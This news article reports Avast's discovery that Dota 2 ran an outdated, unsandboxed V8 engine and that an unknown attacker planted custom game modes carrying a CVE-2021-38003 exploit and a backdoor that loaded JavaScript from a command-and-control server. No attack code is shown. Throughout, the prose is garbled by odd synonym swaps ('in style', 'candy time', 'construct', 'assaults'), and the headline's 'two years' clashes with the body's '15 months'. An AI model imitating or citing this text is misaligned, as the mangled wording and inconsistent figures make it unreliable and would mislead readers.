Valve left a security flaw in Dota 2 for two years until someone tried to exploit it

In context: Launched in 2013, Dota 2 remains to be some of the in style multiplayer experiences amongst MOBA aficionados. And for 15 months, thousands and thousands of Dota 2 gamers have been probably weak to distant code execution assaults due to Valve’s carelessness.

Valve is infamously recognized for taking its candy time making a brand new Half-Life sport (really, any new sport) or counting as much as three. The digital distribution big co-founded by Gabe Newell is seemingly as lax relating to harmful safety vulnerabilities, placing gamers of considered one of its hottest titles in danger and letting hackers go wild with their malicious experimentations.

The free-to-play MOBA title Dota 2 remains to be extraordinarily in style though it was initially launched virtually 10 years in the past on July 9, 2013. Like many different video games, Dota 2 embeds a construct of the V8 JavaScript engine created by Google for the Chrome/Chromium mission. The elemental subject right here is that, till just lately, Valve nonetheless used an outdated construct of the V8 engine compiled in December 2018.

The greater than four-year-old model was riddled with probably harmful safety bugs. What’s worse is Dota 2 does not run V8 with any sandbox safety. A foul actor may have exploited the difficulty to run malicious code remotely towards Dota gamers. In accordance with Avast, that is what happened earlier than Valve lastly up to date the V8 engine.

Avast researchers found that an unknown hacker was testing a possible exploit towards CVE-2021-38003, a particularly harmful safety flaw within the V8 engine with an 8.8/10 severity ranking. At first, the hacker made a seemingly benign take a look at by publishing a brand new customized sport mode — a means for gamers to alter the Dota 2 expertise — with an exploit code for CVE-2021-38003 embedded inside.

After that, the hacker revealed three different sport modes, utilizing a extra covert method by adopting a easy backdoor of solely “about twenty traces of code.” The backdoor may execute arbitrary JS scripts downloaded from a command-and-control server through HTTP. The intelligent trick allowed the attacker to maintain the exploit code hidden and simply replace it with out submitting a brand new customized sport mode for assessment and potential discovery. In different phrases, it could have allowed the hacker to dynamically execute JavaScript code (and sure the CVE-2021-38003 exploit) within the background.

Google patched CVE-2021-38003 in October 2021. In the meantime, the unknown hacker began experimenting in March 2022. Dota 2 builders did not trouble fixing the difficulty till January 2023, when Avast knowledgeable them of its findings. Additional evaluation to seek out different exploits was unsuccessful, whereas the true motivations of the Dota 2 hacker stay unknown.